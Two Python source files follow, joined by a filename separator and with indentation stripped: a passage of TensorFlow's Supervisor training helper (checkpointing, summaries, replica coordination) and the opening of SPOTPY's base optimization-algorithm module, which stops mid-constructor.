# Ask for all the services to stop.
sv.stop()
```
After the call to `prepare_or_create_session()`, all `Variables` in the `Graph`
have been initialized. In addition, a few services have been started
to checkpoint the model and fetch summaries.
If the program crashes and you restart it, the call to
`prepare_or_create_session()` automatically reinitializes the Variables
from most recent checkpoint.
If any of the services raises an exception, it will ask the Supervisor to stop.
In that case `should_stop()` will return True and you should stop your
training loop.
Finish by calling `stop()` to cleanly wait for the services to complete.
If a service thread raised an exception, it is re-raised in the `stop()`
call so your program can easily report it.
Use for multiple replicas:
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index, or
# job_def.name, or job_def.tasks. It's entirely up to the end user. But there
# can be only one *chief*.
is_chief = (server_def.task_index == 0)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
sess = sv.prepare_or_create_session(FLAGS.master)
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
# Ask for all the services to stop.
sv.stop()
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `prepare_or_create_session()` waits for the Model to
have been intialized before returning a session to the training code.
If one of the tasks crashes and restarts, `prepare_or_create_session()` checks
if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model
needs to be initialized, the chief task takes care of reinitializing it;
the other tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
What *master* string to use:
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
Specifying 'local' requests a Session that uses the proto-based "Master
interface" to run TensorFlow programs. It does not use an RPC subsystem to
communicate within the prcoess, and cannot communicate with remote TensorFlow
workers.
Specifying 'localhost:port' requests a Session that uses the loopback RPC
interface, and also allows the in-process master to access remote tensorflow
workers.
Advanced use.
Launching additional services.
`prepare_or_create_session()` launches the Checkpoint and Summary
services (threads). If you need more services to run you can simply
launch them after `prepare_or_create_session()` returns. The Supervisor
uses a Coordinator to help multiple threads stop together, so pass that
coordinator ('sv.coord') to the threads you launch.
Example: Start a QueueRunner to prefetch inputs.
```python
...build the model with a QueueRunner to prefetch inputs...
qr = QueueRunner(input_queue, [enqueue_op])
...
sv = Supervisor(logdir='/tmp/mydir')
sess = sv.prepare_or_create_session(FLAGS.master)
# Start the queue runner threads.
threads = qr.create_threads(sess, sv.coord, start=True)
# Catch OutOfRangeError, which signals that your input queue is exhausted.
try:
while not sv.should_stop():
sess.run(my_train_op)
except tf.errors.OutOfRangeError:
pass
# Wait for the QueueRunner and service threads to complete.
sv.stop(threads)
```
Note: Starting `QueueRunner` threads is very common, to the Supervisor
provides a convenience method named `start_queue_runners()`. If you use
that method you do not have to keep track of the started threads and
can just call `stop()` normally:
```python
...build the model with a QueueRunner to prefetch inputs...
qr = QueueRunner(input_queue, [enqueue_op])
...
sv = Supervisor(logdir='/tmp/mydir')
sess = sv.prepare_or_create_session(FLAGS.master)
# Start the queue runner threads.
sv.start_queue_runners(sess, [qr])
# Catch OutOfRangeError, which signals that your input queue is exhausted.
try:
while not sv.should_stop():
sess.run(my_train_op)
except tf.errors.OutOfRangeError:
pass
# Wait for the QueueRunner and service threads to complete.
sv.stop()
```
Launching fewer services.
`prepare_or_create_session()` launches the `Summary` and `Checkpoint`
services (threads) which use either the optionally `summary_op`
and `saver` passed to the constructor, or default ones created
automatically by the `Supervisor`. If you want to run your own summary
and checkpointing logic, disable these services by passing `None` to the
`summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, prepare_or_create_session() does not start the
# summary thread.
sess = sv.prepare_or_create_session(FLAGS.master)
for step in xrange(1000000):
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
Custom Model Initialization.
`prepare_or_create_session()` only supports initializing the model by running an
`init_op`. If you have special initialization needs, use `local_init_op`.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
from tensorflow.python.training.session_manager import SessionManager
class Supervisor(object):
"""Training helper that checkpoints and computes summaries."""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
# Protects _TENSORFLOW_LAUNCHED
_launch_lock = threading.Lock()
# True if we have already launched the tensorflow in-process server.
_TENSORFLOW_LAUNCHED = False
def __init__(self, graph=None, ready_op=USE_DEFAULT, is_chief=True,
init_op=USE_DEFAULT, init_feed_dict=None,
local_init_op=USE_DEFAULT, logdir=None,
summary_op=USE_DEFAULT, saver=USE_DEFAULT,
global_step=USE_DEFAULT, save_summaries_secs=120,
save_model_secs=600, recovery_wait_secs=30,
checkpoint_basename="model.ckpt", session_manager=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: `Operation` to check if the model is initialized. This
operation is run by supervisors in `prepare_or_create_session()` to
check if the model is ready to use. The model is considered ready if
that operation succeeds. Defaults to the operation returned from
`tf.assert_variables_initialized()` If `None`, the model is not checked
for readiness.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from merge_all_summaries(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saved returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Default to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 ot tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(ready_op=ready_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._is_chief = is_chief
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
self._recovery_wait_secs = recovery_wait_secs
self._coord = coordinator.Coordinator()
if logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._save_path = None
self._summary_writer = None
self._init_session_manager(session_manager=session_manager)
self._started_threads = []
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op, graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self, ready_op=USE_DEFAULT):
"""Initializes ready_op.
Args:
ready_op: `Operation` to check if the model is initialized.
If it's set to USE_DEFAULT, creates an op that checks all
the variables are initialized.
"""
if ready_op is Supervisor.USE_DEFAULT:
ready_op = self._get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.assert_variables_initialized()
if ready_op is not None:
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
self._ready_op = ready_op
def _init_init_op(self, init_op=USE_DEFAULT, init_feed_dict=None):
"""Initializes init_op.
Args:
init_op: `Operation` to initialize the variables. If set to USE_DEFAULT,
create an op that initializes all variables and tables.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
"""
if init_op is Supervisor.USE_DEFAULT:
init_op = self._get_first_op_from_collection(ops.GraphKeys.INIT_OP)
if init_op is None:
init_op = variables.initialize_all_variables()
ops.add_to_collection(ops.GraphKeys.INIT_OP, init_op)
self._init_op = init_op
self._init_feed_dict = init_feed_dict
def _init_local_init_op(self, local_init_op=USE_DEFAULT):
"""Initializes local_init_op.
Args:
local_init_op: `Operation` run for every new supervisor instance. If set
to USE_DEFAULT create an op based on the `LOCAL_INITIALIZERS` graph
collection.
"""
if local_init_op is Supervisor.USE_DEFAULT:
local_init_op = self._get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
self._local_init_op = local_init_op
def _init_saver(self, saver=USE_DEFAULT):
"""Initializes saver.
Args:
saver: A `Saver` object. If set to USE_DEFAULT, create one that
saves all the variables.
"""
if saver is Supervisor.USE_DEFAULT:
saver = self._get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is None and variables.all_variables():
saver = saver_mod.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
self._saver = saver
def _init_summary_op(self, summary_op=USE_DEFAULT):
"""Initilizes summary_op.
Args:
summary_op: An Operation that returns a Summary for the event logs.
If set to USE_DEFAULT, create an op that merges all the summaries.
"""
if summary_op is Supervisor.USE_DEFAULT:
summary_op = self._get_first_op_from_collection(ops.GraphKeys.SUMMARY_OP)
if summary_op is None:
summary_op = logging_ops.merge_all_summaries()
if summary_op is not None:
ops.add_to_collection(ops.GraphKeys.SUMMARY_OP, summary_op)
self._summary_op = summary_op
def _init_global_step(self, global_step=USE_DEFAULT):
"""Initializes global_step.
Args:
global_step: An integer Tensor of size 1 that counts steps. If
set to USE_DEFAULT, creates global_step tensor.
"""
if global_step is Supervisor.USE_DEFAULT:
global_step = self._get_first_op_from_collection(
ops.GraphKeys.GLOBAL_STEP)
if global_step is None:
global_step = self._default_global_step_tensor()
if global_step is not None:
ops.add_to_collection(ops.GraphKeys.GLOBAL_STEP, global_step)
self._global_step = global_step
@property
def session_manager(self):
"""Return the SessionManager used by the Supervisor.
Returns:
A SessionManager object.
"""
return self._session_manager
@property
def coord(self):
"""Return the Coordinator used by the Supervisor.
The Coordinator can be useful if you want to run multiple threads
during your training.
Returns:
A Coordinator object.
"""
return self._coord
@property
def init_op(self):
"""Return the Init Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._init_op
@property
def init_feed_dict(self):
"""Return the feed dictionary used when evaluating the `init_op`.
Returns:
A feed dictionary or `None`.
"""
return self._init_feed_dict
@property
def ready_op(self):
"""Return the Ready Op used by the supervisor.
Returns:
An Op or `None`.
"""
return self._ready_op
@property
def summary_writer(self):
"""Return the SummaryWriter used by the supervisor.
Returns:
A SummaryWriter.
"""
return self._summary_writer
@property
def summary_op(self):
"""Return the Summary Tensor used by the supervisor.
Returns:
A string Tensor for the summary or `None`.
"""
return self._summary_op
@property
def save_summaries_secs(self):
"""Return the delay between summary computations.
Returns:
A timestamp.
"""
return self._save_summaries_secs
@property
def global_step(self):
"""Return the global_step Tensor used by the supervisor.
Returns:
An integer Tensor for the global_step.
"""
return self._global_step
@property
def saver(self):
"""Return the Saver used by the supervisor.
Returns:
A Saver object.
"""
return self._saver
@property
def save_model_secs(self):
"""Return the delay between checkpoints.
Returns:
A timestamp.
"""
return self._save_model_secs
@property
def save_path(self):
"""Return the save path used by the supervisor.
Returns:
A string.
"""
return self._save_path
def _write_graph(self):
"""Writes graph_def to `logdir` and adds it to summary if applicable."""
if not self._is_chief:
return
if self._logdir:
training_util.write_graph(self._graph.as_graph_def(),
self._logdir, "graph.pbtxt")
if self._summary_writer:
self._summary_writer.add_graph(self._graph)
def start_standard_services(self, sess):
"""Start the standard services for 'sess'.
This starts services in the background. The services started depend
on the parameters to the constructor and may include:
- A Summary thread computing summaries every save_summaries_secs.
- A Checkpoint thread saving the model every every save_model_secs.
- A StepCounter thread measure step time.
Args:
sess: A Session.
Returns:
A list of threads that are running the standard services. You can use
the Supervisor's Coordinator to join these threads with:
sv.coord.Join(<list of threads>)
Raises:
ValueError: If not `logdir` was passed to the constructor as the
services need a log directory.
"""
if not self._is_chief:
return
if not self._logdir:
logging.warning("Standard services need a 'logdir' "
"passed to the SessionManager")
return
if self._global_step is not None:
# Only add the session log if we keep track of global step.
# TensorBoard cannot use START message for purging expired events
# if there is no step value.
current_step = training_util.global_step(sess, self._global_step)
self._summary_writer.add_session_log(
SessionLog(status=SessionLog.START),
current_step)
threads = []
if self._summary_op is not None and self._save_summaries_secs:
threads.append(SVSummaryThread(self, sess))
if self._global_step is not None and self._save_summaries_secs:
threads.append(SVStepCounterThread(self, sess))
if self.saver and self._save_model_secs:
threads.append(SVTimerCheckpointThread(self, sess))
for t in threads:
t.start()
self._started_threads.extend(threads)
return threads
def prepare_or_wait_for_session(self, master="", config=None,
wait_for_checkpoint=False,
start_standard_services=True):
"""Make sure the model is ready to be used.
Create a session on 'master', recovering or initializing the model as
needed, or wait for a session to be ready. If running as the chief
and `start_standard_service` is set to True, also call the session
manager to start the standard services.
Args:
master: name of the TensorFlow `master` to use. If not specified or
empty a 'Direct Session' is created.
config: Optional ConfigProto proto used to configure the session,
which is passed as-is to create the session.
wait_for_checkpoint: Whether we should wait for the availability of a
checkpoint before creating Session. Defaults to False.
start_standard_services: Whether to start the standard services,
such as checkpoint, summary and step counter.
Returns:
A Session object that can be used to drive the model.
"""
if self._is_chief:
sess = self._session_manager.prepare_session(
master, self.init_op, self.saver, self._logdir,
wait_for_checkpoint=wait_for_checkpoint, config=config,
init_feed_dict=self._init_feed_dict)
self._write_graph()
# For users who recreate the session with prepare_or_create_session(), we
# need to clear the coordinator's stop_event so that threads managed by
# the coordinator can run.
self._coord.clear_stop()
if start_standard_services:
self.start_standard_services(sess)
else:
sess = self._session_manager.wait_for_session(master, config=config)
return sess
def start_queue_runners(self, sess, queue_runners=None):
"""Start threads for `QueueRunners`.
Args:
sess: A `Session`.
queue_runners: A list of `QueueRunners`. If not specified, we'll use the
list of queue runners gathered in the graph under the key
`GraphKeys.QUEUE_RUNNERS`.
Returns:
The list of threads started for the `QueueRunners`.
"""
if queue_runners is None:
queue_runners = self._graph.get_collection(ops.GraphKeys.QUEUE_RUNNERS)
threads = []
for qr in queue_runners:
threads.extend(qr.create_threads(sess, coord=self._coord, daemon=True,
start=True))
self._started_threads.extend(threads)
return threads
def loop(self, timer_interval_secs, target, args=None):
"""Start a LooperThread that calls a function periodically.
If `timer_interval_secs` is None the thread calls `target(args)`
repeatedly. Otherwise `target(args)` is called every `timer_interval_secs`
seconds. The thread terminates when a stop is requested.
The started thread is added to the list of threads managed by the supervisor
so it does not need to be passed to the `stop()` method.
Args:
timer_interval_secs: Number. Time boundaries at which to call `target`.
target: A callable object.
args: Optional arguments to pass to `target` when calling it.
Returns:
The started thread.
"""
looper = coordinator.LooperThread(self._coord, timer_interval_secs,
target=target, args=args)
looper.start()
self._started_threads.append(looper)
return looper
def stop(self, threads=None, close_summary_writer=True):
"""Stop the services and the coordinator.
This does not Close the session.
Args:
threads: Optional list of threads to join with the coordinator. If
`None`, defaults to the threads running the standard services plus the
threads started for `QueueRunners` if `start_queue_runners()` was
called. To wait on an additional set of threads, pass the list in this
parameter and they will be merged with the internal list of running
services.
close_summary_writer: Whether to close the `summary_writer`. Defaults to
`True`.
"""
join_threads = []
join_threads.extend(self._started_threads)
if threads is not None:
join_threads.extend(threads)
self._coord.request_stop()
self._coord.join(join_threads)
# Close the write last, in case one of the running threads was using it.
if close_summary_writer and self._summary_writer:
# Stop messages are not logged with event.step,
# since the session may have already terminated.
self._summary_writer.add_session_log(SessionLog(status=SessionLog.STOP))
self._summary_writer.close()
self._started_threads = []
def request_stop(self, ex=None):
"""Request that the coordinator stop the threads.
See `Coordinator.request_stop()`.
Args:
ex: Optional `Exception`, or Python `exc_info` tuple as returned by
`sys.exc_info()`. If this is the first call to `request_stop()` the
corresponding exception is recorded and re-raised from `join()`.
"""
self._coord.request_stop(ex=ex)
def should_stop(self):
"""Check if the coordinator was told to stop.
See `Coordinator.should_stop()`.
Returns:
True if the coordinator was told to stop, False otherwise.
"""
return self._coord.should_stop()
def stop_on_exception(self):
"""Context handler to stop the supervisor when an exception is raised.
See `Coordinator.stop_on_exception()`.
Returns:
A context handler.
"""
return self._coord.stop_on_exception()
def wait_for_stop(self):
"""Block waiting for the coordinator to stop."""
self._coord.wait_for_stop()
def summary_computed(self, sess, summary, global_step=None):
"""Indicate that a summary was computed.
Args:
sess: A `Session` object.
summary: A Summary proto, or a string holding a serialized summary proto.
global_step: Int. global step this summary is associated with. If `None`,
it will try to fetch the current step.
Raises:
TypeError: if 'summary' is not a Summary proto or a string.
RuntimeError: if the Supervisor was created without a `logdir`.
"""
if not self._logdir:
raise RuntimeError("summary_computed() requires a logdir")
if global_step is None and self.global_step is not None:
global_step = training_util.global_step(sess, self.global_step)
if self._summary_writer:
self._summary_writer.add_summary(summary, global_step)
def _default_global_step_tensor(self):
try:
gs = ops.get_default_graph().get_tensor_by_name("global_step:0")
if gs.dtype.base_dtype in [dtypes.int32, dtypes.int64]:
return gs
else:
logging.warning("Found 'global_step' is not an int type: %s", gs.dtype)
return None
except KeyError:
return None
def _verify_setup(self):
"""Check that all is good.
Raises:
ValueError: If something is not good.
"""
# Not running as chief means that replicas are used.
# In that case all Variables must have their device set.
if not self._is_chief:
for op in self._graph.get_operations():
if op.type == "Variable" and not op.device:
raise ValueError("When using replicas, all Variables must have "
"their device set: %s" % op)
class SVSummaryThread(coordinator.LooperThread):
"""A thread to save summaries on a timer."""
def __init__(self, sv, sess):
"""Create a SVSummaryThread.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVSummaryThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
if self._sv.global_step is not None:
summary_strs, global_step = self._sess.run([self._sv.summary_op,
self._sv.global_step])
else:
summary_strs = self._sess.run(self._sv.summary_op)
global_step = None
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary_strs, global_step)
class SVStepCounterThread(coordinator.LooperThread):
"""Threads to count steps and measure their duration."""
def __init__(self, sv, sess):
"""Create a `SVStepCounterThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVStepCounterThread, self).__init__(sv.coord, sv.save_summaries_secs)
self._sv = sv
self._sess = sess
self._last_time = 0.0
self._last_step = 0
self._summary_tag = "%s/sec" % self._sv.global_step.op.name
def start_loop(self):
self._last_time = time.time()
self._last_step = training_util.global_step(
self._sess, self._sv.global_step)
def run_loop(self):
# Count the steps.
current_step = training_util.global_step(self._sess, self._sv.global_step)
added_steps = current_step - self._last_step
self._last_step = current_step
# Measure the elapsed time.
current_time = time.time()
elapsed_time = current_time - self._last_time
self._last_time = current_time
# Reports the number of steps done per second
steps_per_sec = added_steps / elapsed_time
summary = Summary(value=[Summary.Value(tag=self._summary_tag,
simple_value=steps_per_sec)])
if self._sv.summary_writer:
self._sv.summary_writer.add_summary(summary, current_step)
logging.log_first_n(logging.INFO, "%s: %g", 10,
self._summary_tag, steps_per_sec)
class SVTimerCheckpointThread(coordinator.LooperThread):
"""A thread to checkpoint on a timer."""
def __init__(self, sv, sess):
"""Create a `SVTimerCheckpointThread`.
Args:
sv: A `Supervisor`.
sess: A `Session`.
"""
super(SVTimerCheckpointThread, self).__init__(sv.coord, sv.save_model_secs)
self._sv = sv
self._sess = sess
def run_loop(self):
self._sv.saver.save(self._sess, self._sv.save_path,
global_step=self._sv.global_step)
if self._sv.summary_writer and self._sv.global_step is not None:
current_step = training_util.global_step(self._sess, self._sv.global_step)
self._sv.summary_writer.add_session_log(
SessionLog(status=SessionLog.CHECKPOINT,
checkpoint_path=self._sv.save_path),
current_step)
# TODO(sherrym): All non-PEP8 compliant names will be deprecated shortly.
setattr(Supervisor, "PrepareSession", Supervisor.prepare_or_wait_for_session)
setattr(Supervisor, "StartQueueRunners", Supervisor.start_queue_runners)
setattr(Supervisor, "StartStandardServices", Supervisor.start_standard_services)
setattr(Supervisor, "Stop", Supervisor.stop)
setattr(Supervisor, "RequestStop", Supervisor.request_stop)
setattr(Supervisor, "Loop", Supervisor.loop)
setattr(Supervisor, "ShouldStop", Supervisor.should_stop)
setattr(Supervisor, "StopOnException", Supervisor.stop_on_exception)
setattr(Supervisor, "WaitForStop", Supervisor.wait_for_stop)
setattr(Supervisor, "SummaryComputed", Supervisor.summary_computed)
|
_algorithm.py
|
'''
Copyright (c) 2018 by Tobias Houska
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: Tobias Houska
This file holds the standards for every algorithm.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from spotpy import database
from spotpy import parameter
import numpy as np
import time
import threading
try:
from queue import Queue
except ImportError:
# If the running python version is 2.* we have only Queue available as a multiprocessing class
# we need to stop the whole main process which this sleep for one microsecond otherwise the subprocess is not
# finished and the main process can not access it and put it as garbage away (Garbage collectors cause)
# However this slows down the whole simulation process and is a boring bug. Python3.x does not need this
# workaround
from Queue import Queue
class _RunStatistic(object):
"""
this class checks for each run if the objectivefunction got better and holds the
best parameter set.
Every _algorithm has an object of this class as status.
Usage:
status = _RunStatistic()
status(rep,like,params)
"""
def __init__(self, repetitions, algorithm_name, optimization_direction, parnames):
self.optimization_direction = optimization_direction #grid, mazimize, minimize
print('Initializing the ',algorithm_name,' with ',repetitions,' repetitions')
if optimization_direction == 'minimize':
self.compare = self.minimizer
print('The objective function will be minimized')
if optimization_direction == 'maximize':
self.compare = self.maximizer
print('The objective function will be maximized')
if optimization_direction == 'grid':
self.compare = self.grid
self.rep = 0
self.parnames = parnames
self.parameters= len(parnames)
self.params_min = [np.nan]*self.parameters
self.params_max = [np.nan]*self.parameters
self.objectivefunction_min = 1e308
self.objectivefunction_max = -1e308
self.starttime = time.time()
self.last_print = time.time()
self.repetitions = repetitions
self.stop = False
def minimizer(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
def maximizer(self, objval, params):
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def grid(self, objval, params):
if objval < self.objectivefunction_min:
self.objectivefunction_min = objval
self.params_min = list(params)
if objval > self.objectivefunction_max:
self.objectivefunction_max = objval
self.params_max = list(params)
def __call__(self, objectivefunction, params, block_print=False):
self.rep+=1
if type(objectivefunction) == type([]): #TODO: change to iterable
self.compare(objectivefunction[0], params)
elif type(objectivefunction) == type(np.array([])):
pass
else:
self.compare(objectivefunction, params)
if self.rep == self.repetitions:
self.stop = True
if not block_print:
self.print_status()
def print_status(self):
# get str showing approximate timeleft to end of simulation in H, M, S
acttime = time.time()
# Refresh progressbar every two second
if acttime - self.last_print >= 2:
avg_time_per_run = (acttime - self.starttime) / (self.rep + 1)
timestr = time.strftime("%H:%M:%S", time.gmtime(round(avg_time_per_run * (self.repetitions - (self.rep + 1)))))
if self.optimization_direction == 'minimize':
text = '%i of %i, minimal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, timestr)
if self.optimization_direction == 'maximize':
text = '%i of %i, maximal objective function=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_max, timestr)
if self.optimization_direction == 'grid':
text = '%i of %i, min objf=%g, max objf=%g, time remaining: %s' % (
self.rep, self.repetitions, self.objectivefunction_min, self.objectivefunction_max, timestr)
print(text)
self.last_print = time.time()
def print_status_final(self):
print('\n*** Final SPOTPY summary ***')
print('Total Duration: ' + str(round((time.time() - self.starttime), 2)) + ' seconds')
print('Total Repetitions:', self.rep)
if self.optimization_direction == 'minimize':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
if self.optimization_direction == 'maximize':
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
if self.optimization_direction == 'grid':
print('Minimal objective value: %g' % (self.objectivefunction_min))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_min[i])
print(text)
print('Maximal objective value: %g' % (self.objectivefunction_max))
print('Corresponding parameter setting:')
for i in range(self.parameters):
text = '%s: %g' % (self.parnames[i], self.params_max[i])
print(text)
print('******************************\n')
def __repr__(self):
return 'Min objectivefunction: %g \n Max objectivefunction: %g' % (
self.objectivefunction_min, self.objectivefunction_max)
class _algorithm(object):
"""
Implements an algorithm.
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
Name of the database where parameter, objectivefunction value and simulation
results will be saved.
dbformat: str
ram: fast suited for short sampling time. no file will be created and results are saved in an array.
csv: A csv file will be created, which you can import afterwards.
parallel: str
seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
mpc: Multi processing: Iterations on all available cores on your (single) pc
mpi: Message Passing Interface: Parallel computing on high performance computing clusters, py4mpi needs to be installed
save_threshold: float or list
Compares the given value/list of values with return value/list of values from spot_setup.objectivefunction.
If the objectivefunction value is higher, the results are saved in the database. If not they are ignored (saves storage).
db_precision:np.float type
set np.float16, np.float32 or np.float64 for rounding of floats in the output database
Default is np.float16
sim_timeout: float, int or None, default: None
the defined model given in the spot_setup class can be controlled to break after 'sim_timeout' seconds if
sim_timeout is not None.
If the model run has been broken simlply '[nan]' will be returned.
random_state: int or None, default: None
the algorithms uses the number in random_state as seed for numpy. This way stochastic processes can be reproduced.
"""
_unaccepted_parameter_types = (parameter.List, )
def __init__(self, spot_setup, dbname=None, dbformat=None, dbinit=True,
dbappend=False, parallel='seq', save_sim=True, breakpoint=None,
backup_every_rep=100, save_threshold=-np.inf, db_precision=np.float16,
sim_timeout=None, random_state=None, optimization_direction='grid', algorithm_name=''):
# Initialize the user defined setup class
self.setup = spot_setup
param_info = parameter.get_parameters_array(self.setup, unaccepted_parameter_types=self._unaccepted_parameter_types)
self.all_params = param_info['random']
self.constant_positions = parameter.get_constant_indices(spot_setup)
if self.constant_positions:
self.non_constant_positions = []
for i, val in enumerate(self.all_params):
if self.all_params[i] not in self.constant_positions:
self.non_constant_positions.append(i)
else:
self.non_constant_positions = np.arange(0,len(self.all_params))
self.parameter = self.get_parameters
self.parnames = param_info['name']
self.algorithm_name = algorithm_name
# Create a type to hold the parameter values using a namedtuple
self.partype = parameter.ParameterSet(param_info)
self.evaluation = self.setup.evaluation()
self.save_sim = save_sim
self.optimization_direction = optimization_direction
self.dbname = dbname or 'customDb'
self.dbformat = dbformat or 'ram'
self.db_precision = db_precision
self.breakpoint = breakpoint
self.backup_every_rep = backup_every_rep
# Two parameters to control the data base handling
# 'dbinit' triggers the initial creation of the data base file
# 'dbappend' used to append to the existing data base, after restart
self.dbinit = dbinit
self.dbappend = dbappend
# Set the random state
if random_state is None: #ToDo: Have to discuss if these 3 lines are neccessary.
random_state = np.random.randint(low=0, high=2**30)
np.random.seed(random_state)
# If value is not None a timeout will set so that the simulation will break after sim_timeout seconds without return a value
self.sim_timeout = sim_timeout
